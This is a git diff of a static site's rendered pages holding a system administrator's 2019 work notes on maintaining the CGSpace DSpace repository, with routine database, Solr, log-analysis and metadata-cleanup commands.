            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
            +
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
             UPDATE 1551
            -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
            +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
             UPDATE 2070
            -dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
            +dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
             UPDATE 2
             
            • Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace
            • diff --git a/docs/2019-07/index.html b/docs/2019-07/index.html index f2473457d..2205cd47b 100644 --- a/docs/2019-07/index.html +++ b/docs/2019-07/index.html @@ -38,7 +38,7 @@ CGSpace Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community "/> - + @@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
          -
          org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
          +
          org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
           
          • I restarted Tomcat ten times and it never worked…
          • I tried to stop Tomcat and delete the write locks:
          # systemctl stop tomcat7
          -# find /dspace/solr/statistics* -iname "*.lock" -print -delete
          +# find /dspace/solr/statistics* -iname "*.lock" -print -delete
           /dspace/solr/statistics/data/index/write.lock
           /dspace/solr/statistics-2010/data/index/write.lock
           /dspace/solr/statistics-2011/data/index/write.lock
          @@ -170,7 +170,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
           /dspace/solr/statistics-2016/data/index/write.lock
           /dspace/solr/statistics-2017/data/index/write.lock
           /dspace/solr/statistics-2018/data/index/write.lock
          -# find /dspace/solr/statistics* -iname "*.lock" -print -delete
          +# find /dspace/solr/statistics* -iname "*.lock" -print -delete
           # systemctl start tomcat7
           
          • But it still didn’t work!
          • @@ -221,8 +221,8 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
        -
        $ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
        -$ echo "10568/101992" >> item_*/collections
        +
        $ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
        +$ echo "10568/101992" >> item_*/collections
         $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
         
        • I noticed that all twenty-seven items had double dates like “2019-05||2019-05” so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection
        • @@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
      -
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-07-04-orcid-ids.txt
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-07-04-orcid-ids.txt
       $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
       
      • Send and merge a pull request for the new ORCID identifiers (#428)
      • I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the databse:
      cg.creator.id,correct
      -"Marius Ekué: 0000-0002-5829-6321","Marius R.M. Ekué: 0000-0002-5829-6321"
      -"Mwungu: 0000-0001-6181-8445","Chris Miyinzi Mwungu: 0000-0001-6181-8445"
      -"Mwungu: 0000-0003-1658-287X","Chris Miyinzi Mwungu: 0000-0003-1658-287X"
      +"Marius Ekué: 0000-0002-5829-6321","Marius R.M. Ekué: 0000-0002-5829-6321"
      +"Mwungu: 0000-0001-6181-8445","Chris Miyinzi Mwungu: 0000-0001-6181-8445"
      +"Mwungu: 0000-0003-1658-287X","Chris Miyinzi Mwungu: 0000-0003-1658-287X"
       
      • But when I ran fix-metadata-values.py I didn’t see any changes:
      -
      $ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
      +
      $ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
       

      2019-07-06

      • Send a reminder to Marie about my notes on the CG Core v2 issue I created two weeks ago
      • @@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
      • Playing with the idea of using xsv to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:
      -
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
      +
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
       field,value,count
       cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
      -$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'         
      +$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'         
       field,value,count
       dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
       
      • Or perhaps if DOIs are valid or not (having doi.org in the URL):
      -
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
      +
      $ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
       field,value,count
       cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
       
      -
      $ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '"' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
      +
      $ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '"' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
       dc.identifier.issn
       978-3-319-71997-9
       978-3-319-71997-9
      @@ -350,13 +350,13 @@ dc.identifier.issn
       
    • Run all system updates on DSpace Test (linode19) and reboot it
    • Try to run dspace cleanup -v on CGSpace and ran into an error:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(167394) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(167394) is still referenced from table "bundle".
     
    • The solution is, as always:
    # su - postgres
    -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
    +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
     UPDATE 1
     

    2019-07-16

      @@ -371,9 +371,9 @@ $ sudo rm -rf ~/.local/share/containers $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • Start working on implementing the CG Core v2 changes on my local DSpace test environment
    • @@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
      • Create an account for Lionelle Samnick on CGSpace because the registration isn’t working for some reason:
      -
      $ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
      +
      $ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
       
      • I added her as a submitter to CTA ISF Pro-Agro series
      • Start looking at 1429 records for the Bioversity batch import @@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.

        I might be able to use isbnlib to validate ISBNs in Python:

      -
      if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
      -    print("Yes")
      +
      if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
      +    print("Yes")
       else:
      -    print("No")
      +    print("No")
       
      from stdnum import isbn
       from stdnum import issn
       
      -isbn.validate('978-92-9043-389-7')
      -issn.validate('1020-3362')
      +isbn.validate('978-92-9043-389-7')
      +issn.validate('1020-3362')
       

      2019-07-26

      • @@ -510,7 +510,7 @@ issn.validate('1020-3362')

        I figured out a GREL to trim spaces in multi-value cells without splitting them:

      -
      value.replace(/\s+\|\|/,"||").replace(/\|\|\s+/,"||")
      +
      value.replace(/\s+\|\|/,"||").replace(/\|\|\s+/,"||")
       
      • I whipped up a quick script using Python Pandas to do whitespace cleanup
      diff --git a/docs/2019-08/index.html b/docs/2019-08/index.html index c0bb17091..b192c3262 100644 --- a/docs/2019-08/index.html +++ b/docs/2019-08/index.html @@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded… wow, that’s luck Run system updates on DSpace Test (linode19) and reboot it "/> - + @@ -235,7 +235,7 @@ Run system updates on DSpace Test (linode19) and reboot it
    -
    # /opt/certbot-auto renew --standalone --pre-hook "/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld" --post-hook "/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx"
    +
    # /opt/certbot-auto renew --standalone --pre-hook "/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld" --post-hook "/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx"
     
    • It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains
    • Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04’s OpenSSL 1.1.0g with nginx 1.16.0
    • @@ -243,9 +243,9 @@ Run system updates on DSpace Test (linode19) and reboot it
    • Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:
    $ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
    -$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload.csv
    +$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload.csv
     $ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
    -$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs2.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload2.csv
    +$ grep -B1 "Download failed" /tmp/2019-08-08-download-pdfs2.txt | grep "Downloading" | sed -e 's/> Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 > /tmp/user-upload2.csv
     $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
     
    • @@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
      • Create a test user on DSpace Test for Mohammad Salem to attempt depositing:
      -
      $ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
      +
      $ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
       
      • Create and merge a pull request (#429) to add eleven new CCAFS Phase II Project Tags to CGSpace
      • Atmire responded to the Solr cores issue last week, but they could not reproduce the issue @@ -345,7 +345,7 @@ java.lang.OutOfMemoryError: GC overhead limit exceeded
      • I increased the heap size to 1536m and tried again:
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1536m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1536m"
       $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
       
      • This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM
      • @@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
     $ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
     $ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
     
      @@ -429,7 +429,7 @@ return os.path.basename(value)
    -
    $ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
    +
    $ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
     
    • Apply the corrections on CGSpace and DSpace Test
        @@ -478,7 +478,7 @@ sys 2m24.715s
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
     COPY 65597
     
    • Then I created a new CSV with two author columns (edit title of second column after):
    • @@ -492,7 +492,7 @@ COPY 65597
    • This fixed a bunch of issues with spaces, commas, unneccesary Unicode characters, etc
    • Then I ran the corrections on my test server and there were 185 of them!
    -
    $ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
    +
    $ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
     
    • I very well might run these on CGSpace soon…
    @@ -506,7 +506,7 @@ COPY 65597 -
    $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec ./cgcore-xsl-replacements.sed {} \;
    +
    $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec ./cgcore-xsl-replacements.sed {} \;
     
    • I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
        @@ -526,7 +526,7 @@ COPY 65597
    -
    "handles":["10986/30568","10568/97825"],"handle":"10986/30568"
    +
    "handles":["10986/30568","10568/97825"],"handle":"10986/30568"
     
    • So this is the same issue we had before, where Altmetric knows this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn’t show it because it seems to a secondary handle or something
    diff --git a/docs/2019-09/index.html b/docs/2019-09/index.html index 4a8340d20..f40993605 100644 --- a/docs/2019-09/index.html +++ b/docs/2019-09/index.html @@ -12,7 +12,7 @@ Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -60,7 +60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning: 7249 2a01:7e00::f03c:91ff:fe18:7396 9124 45.5.186.2 "/> - + @@ -163,7 +163,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         440 17.58.101.255
         441 157.55.39.101
         485 207.46.13.43
    @@ -174,7 +174,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
         814 207.46.13.212
        2472 163.172.71.23
        6092 3.94.211.189
    -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          33 2a01:7e00::f03c:91ff:fe16:fcb
          57 3.83.192.124
          57 3.87.77.25
    @@ -193,14 +193,14 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
     
    • It actually got mostly HTTP 200 responses:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | awk '{print $9}' | sort | uniq -c
        1775 200
         703 499
          72 503
     
    • And it was mostly requesting Discover pages:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c 
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | grep 163.172.71.23 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c 
        2350 discover
          71 handle
     
      @@ -284,11 +284,11 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
    • Around the same time I see the following in the DSpace log:
    2019-09-15 15:32:18,079 INFO  org.dspace.usage.LoggerUsageEventListener @ aorth@blah:session_id=A11C362A7127004C24E77198AF9E4418:ip_addr=x.x.x.x:view_item:handle=10568/103644 
    -2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name="METSRIGHTS"
    +2019-09-15 15:32:18,135 WARN  org.dspace.core.PluginManager @ Cannot find named plugin for interface=org.dspace.content.crosswalk.DisseminationCrosswalk, name="METSRIGHTS"
     
    • I see a lot of these errors today, but not earlier this month:
    -
    # grep -c 'Cannot find named plugin' dspace.log.2019-09-*
    +
    # grep -c 'Cannot find named plugin' dspace.log.2019-09-*
     dspace.log.2019-09-01:0
     dspace.log.2019-09-02:0
     dspace.log.2019-09-03:0
    @@ -307,9 +307,9 @@ dspace.log.2019-09-15:808
     
    • Something must have happened when I restarted Tomcat a few hours ago, because earlier in the DSpace log I see a bunch of errors like this:
    -
    2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.METSRightsCrosswalk", name="METSRIGHTS"
    -2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.OREDisseminationCrosswalk", name="ore"
    -2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.DIMDisseminationCrosswalk", name="dim"
    +
    2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.METSRightsCrosswalk", name="METSRIGHTS"
    +2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.OREDisseminationCrosswalk", name="ore"
    +2019-09-15 13:59:24,136 ERROR org.dspace.core.PluginManager @ Name collision in named plugin, implementation class="org.dspace.content.crosswalk.DIMDisseminationCrosswalk", name="dim"
     
    • I restarted Tomcat and the item views came back, but then the Solr statistics cores didn’t all load properly
        @@ -326,9 +326,9 @@ dspace.log.2019-09-15:808 # docker run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
    • Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications @@ -339,26 +339,26 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    dc.contributor.author,cg.creator.id
    -"Kihara, Job","Job Kihara: 0000-0002-4394-9553"
    -"Twyman, Jennifer","Jennifer Twyman: 0000-0002-8581-5668"
    -"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    -"Arango, Jacobo","Jacobo Arango: 0000-0002-4828-9398"
    -"Chavarriaga Aguirre, Paul","Paul Chavarriaga-Aguirre: 0000-0001-7579-3250"
    -"Paul, Birthe","Birthe Paul: 0000-0002-5994-5354"
    -"Eitzinger, Anton","Anton Eitzinger: 0000-0001-7317-3381"
    -"Hoek, Rein van der","Rein van der Hoek: 0000-0003-4528-7669"
    -"Aranzales Rondón, Ericson","Ericson Aranzales Rondon: 0000-0001-7487-9909"
    -"Staiger-Rivas, Simone","Simone Staiger: 0000-0002-3539-0817"
    -"de Haan, Stef","Stef de Haan: 0000-0001-8690-1886"
    -"Pulleman, Mirjam","Mirjam Pulleman: 0000-0001-9950-0176"
    -"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
    -"Tamene, Lulseged","Lulseged Tamene: 0000-0002-3806-8890"
    -"Andrieu, Nadine","Nadine Andrieu: 0000-0001-9558-9302"
    -"Ramírez-Villegas, Julián","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Kihara, Job","Job Kihara: 0000-0002-4394-9553"
    +"Twyman, Jennifer","Jennifer Twyman: 0000-0002-8581-5668"
    +"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    +"Arango, Jacobo","Jacobo Arango: 0000-0002-4828-9398"
    +"Chavarriaga Aguirre, Paul","Paul Chavarriaga-Aguirre: 0000-0001-7579-3250"
    +"Paul, Birthe","Birthe Paul: 0000-0002-5994-5354"
    +"Eitzinger, Anton","Anton Eitzinger: 0000-0001-7317-3381"
    +"Hoek, Rein van der","Rein van der Hoek: 0000-0003-4528-7669"
    +"Aranzales Rondón, Ericson","Ericson Aranzales Rondon: 0000-0001-7487-9909"
    +"Staiger-Rivas, Simone","Simone Staiger: 0000-0002-3539-0817"
    +"de Haan, Stef","Stef de Haan: 0000-0001-8690-1886"
    +"Pulleman, Mirjam","Mirjam Pulleman: 0000-0001-9950-0176"
    +"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
    +"Tamene, Lulseged","Lulseged Tamene: 0000-0002-3806-8890"
    +"Andrieu, Nadine","Nadine Andrieu: 0000-0001-9558-9302"
    +"Ramírez-Villegas, Julián","Julian Ramirez-Villegas: 0000-0002-8044-583X"
     
    • I tested the file on my local development machine with the following invocation:
    -
    $ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • In my test environment this added 390 ORCID identifier
    • I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update
    • @@ -386,11 +386,11 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
    • Follow up with Marissa again about the CCAFS phase II project tags
    • Generate a list of the top 1500 authors on CGSpace:
    -
    dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
    +
    dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
     
    • Then I used csvcut to select the column of author names, strip the header and quote characters, and saved the sorted file:
    -
    $ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/"//g' | sort > dspace/config/controlled-vocabularies/dc-contributor-author.xml
    +
    $ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/"//g' | sort > dspace/config/controlled-vocabularies/dc-contributor-author.xml
     
    • After adding the XML formatting back to the file I formatted it using XML tidy:
    @@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s -
    $ perl-rename -n 's/_{2,3}/_/g' *.pdf
    +
